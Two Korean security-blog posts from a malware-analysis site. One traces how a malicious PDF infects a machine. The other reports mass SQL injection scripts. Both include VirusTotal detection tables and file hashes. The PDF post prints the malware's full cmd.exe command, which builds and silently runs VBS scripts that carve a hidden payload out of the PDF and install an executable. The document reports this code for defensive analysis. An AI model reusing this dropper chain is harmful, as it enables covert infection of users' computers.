태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'attack'에 해당되는 글 2건

  1. 2010.06.09 PDF 취약점을 이용한 악성코드 감염 과정
  2. 2009.09.02 Mass SQL Injection
보안관련소식2010.06.09 12:17


PDF 취약점 파일 감염 과정입니다.

보통 이메일 첨부파일 형태로 불특정 다수에게 배포되기도 합니다.

참고 자료 보기
pdf 악성코드 메일로 유포된 사례
viruslab.tistory.com

먼저 해당 파일을 실행하면 다음과 같은 화면과 문서 파일이 뒷부분으로 보여집니다.

사용자 삽입 이미지

C:\WINDOWS\system32\cmd.exe /c echo Dim BinaryStream > temp_system321.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream") >> temp_system321.vbs && echo BinaryStream.Type = 1 >> temp_system321.vbs && echo BinaryStream.Open >> temp_system321.vbs && echo BinaryStream.LoadFromFile FindLastModified(".") >> temp_system321.vbs && echo BinaryStream.Position=77072      >> temp_system321.vbs && echo s = BinaryStream.Read (204444    -77072     ) >> temp_system321.vbs && echo BinaryStream.Close >> temp_system321.vbs && echo BinaryStream.Open >> temp_system321.vbs && echo BinaryStream.Write s >> temp_system321.vbs && echo BinaryStream.SaveToFile "temp_system322.vbs",2 >> temp_system321.vbs && echo BinaryStream.Close >> temp_system321.vbs && echo dim wshshell >> temp_system321.vbs && echo set wshshell = wscript.createobject("wscript.shell") >> temp_system321.vbs && echo wshshell.run "temp_system322.vbs",0,FALSE >> temp_system321.vbs && echo Function FindLastModified(strDir)   >> temp_system321.vbs && echo Set objFSO = CreateObject("Scripting.FileSystemObject")   >> temp_system321.vbs && echo Set oFolder = objFSO.GetFolder(strDir)   >> temp_system321.vbs && echo d = CDate("1/1/1950")   >> temp_system321.vbs && echo For Each oFile In oFolder.Files   >> temp_system321.vbs && echo If oFile.DateLastModified ^> d and InStr(oFile.Name, ".pdf") ^> 0 Then   >> temp_system321.vbs && echo NewestFile = oFile.Name   >> temp_system321.vbs && echo d = oFile.DateLastModified   >> temp_system321.vbs && echo End If   >> temp_system321.vbs && echo Next   >> temp_system321.vbs && echo FindLastModified = NewestFile   >> temp_system321.vbs && echo End Function    >> temp_system321.vbs  && temp_system321.vbs


  && echo


PLEASE PRESS OK BUTTON!



사용자 삽입 이미지

system321.vbs, system322.vbs 등의 스크립트 파일을 생성하여 exe 파일을 설치합니다.
 
사용자 삽입 이미지
사용자 삽입 이미지

현재 system32.exe 파일이 생성되지만 손상된 형태로 만들어지고 있는 것으로 파악되었습니다.

바이러스 토탈 진단 현황

http://www.virustotal.com/analisis/1e70058128ebfff634a453483dd48cc4e929bda17e960d1d5c0e2b7722ca017a-1276041725

Antivirus Version Last Update Result
a-squared 5.0.0.26 2010.06.09 Exploit.PDF-Dropper!IK
AhnLab-V3 2010.06.09.00 2010.06.09 -
AntiVir 8.2.2.6 2010.06.08 -
Antiy-AVL 2.0.3.7 2010.06.08 -
Authentium 5.2.0.5 2010.06.08 PDF/Expl.HY
Avast 4.8.1351.0 2010.06.08 PDF:Risk-A
Avast5 5.0.332.0 2010.06.08 PDF:Risk-A
AVG 9.0.0.787 2010.06.08 -
BitDefender 7.2 2010.06.09 Exploit.PDF-Dropper.Gen
CAT-QuickHeal 10.00 2010.06.08 -
ClamAV 0.96.0.3-git 2010.06.09 -
Comodo 5033 2010.06.09 -
DrWeb 5.0.2.03300 2010.06.09 -
eSafe 7.0.17.0 2010.06.08 PDF.DropperExploit.Gen
eTrust-Vet 36.1.7618 2010.06.08 PDF/POS!exploit
F-Prot 4.6.0.103 2010.06.08 -
F-Secure 9.0.15370.0 2010.06.08 Exploit.PDF-Dropper.Gen
Fortinet 4.1.133.0 2010.06.08 -
GData 21 2010.06.09 Exploit.PDF-Dropper.Gen
Ikarus T3.1.1.84.0 2010.06.08 Exploit.PDF-Dropper
Jiangmin 13.0.900 2010.06.08 -
Kaspersky 7.0.0.125 2010.06.08 Trojan-Dropper.VBS.Pdfka.a
McAfee 5.400.0.1158 2010.06.09 Exploit-PDF.ck
McAfee-GW-Edition 2010.1 2010.06.08 -
Microsoft 1.5802 2010.06.08 -
NOD32 5183 2010.06.08 -
Norman 6.04.12 2010.06.08 -
nProtect 2010-06-08.01 2010.06.08 Exploit.PDF-Dropper.Gen
Panda 10.0.2.7 2010.06.08 -
PCTools 7.0.3.5 2010.06.09 HeurEngine.PDF
Prevx 3.0 2010.06.09 -
Rising 22.51.01.04 2010.06.08 -
Sophos 4.53.0 2010.06.09 -
Sunbelt 6421 2010.06.09 -
Symantec 20101.1.0.89 2010.06.08 Bloodhound.PDF.24
TheHacker 6.5.2.0.295 2010.06.08 -
TrendMicro 9.120.0.1004 2010.06.08 -
TrendMicro-HouseCall 9.120.0.1004 2010.06.09 -
VBA32 3.12.12.5 2010.06.08 -
ViRobot 2010.6.8.2343 2010.06.08 -
VirusBuster 5.0.27.0 2010.06.08 VBS.Exedrop.F



Posted by viruslab
신종악성코드정보2009.09.02 09:08


9월 1일부터 SQL Injection 공격코드가 다수 목격되고 있습니다.

a.js, x.js 등등

사용자 삽입 이미지

http://www.virustotal.com/analisis/4636b8e5142447a4174108e510c21292c91868c51e84cf5368d5e604a08589d4-1251838122

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.09.01 -
AhnLab-V3 5.0.0.2 2009.09.01 -
AntiVir 7.9.1.7 2009.09.01 -
Antiy-AVL 2.0.3.7 2009.09.01 -
Authentium 5.1.2.4 2009.09.01 -
Avast 4.8.1335.0 2009.09.01 -
AVG 8.5.0.406 2009.09.01 -
BitDefender 7.2 2009.09.01 -
CAT-QuickHeal 10.00 2009.09.01 -
ClamAV 0.94.1 2009.09.01 -
Comodo 2173 2009.09.01 -
DrWeb 5.0.0.12182 2009.09.01 modification of Trojan.Click.26559
eSafe 7.0.17.0 2009.09.01 -
eTrust-Vet 31.6.6714 2009.09.01 -
F-Prot 4.5.1.85 2009.09.01 -
Fortinet 3.120.0.0 2009.09.01 -
GData 19 2009.09.01 -
Ikarus T3.1.1.68.0 2009.09.01 -
Jiangmin 11.0.800 2009.09.01 -
K7AntiVirus 7.10.833 2009.09.01 -
Kaspersky 7.0.0.125 2009.09.01 -
McAfee 5727 2009.09.01 -
McAfee+Artemis 5727 2009.09.01 -
McAfee-GW-Edition 6.8.5 2009.09.01 -
Microsoft 1.5005 2009.09.01 -
NOD32 4387 2009.09.01 -
Norman 2009.09.01 -
nProtect 2009.1.8.0 2009.09.01 -
Panda 10.0.2.2 2009.09.01 -
PCTools 4.4.2.0 2009.08.31 -
Prevx 3.0 2009.09.01 -
Rising 21.45.14.00 2009.09.01 -
Sophos 4.45.0 2009.09.01 -
Sunbelt 3.2.1858.2 2009.09.01 -
Symantec 1.4.4.12 2009.09.01 -
TheHacker 6.3.4.3.393 2009.08.31 -
TrendMicro 8.950.0.1094 2009.09.01 -
VBA32 3.12.10.10 2009.09.01 -
ViRobot 2009.9.1.1911 2009.09.01 -
VirusBuster 4.6.5.0 2009.09.01 -
Additional information
File size: 523 bytes
MD5   : 7edb05c16956594ff052a7f0cf41f49e
SHA1  : c3c9412bafd063522840baf9ba42173711337744

Posted by viruslab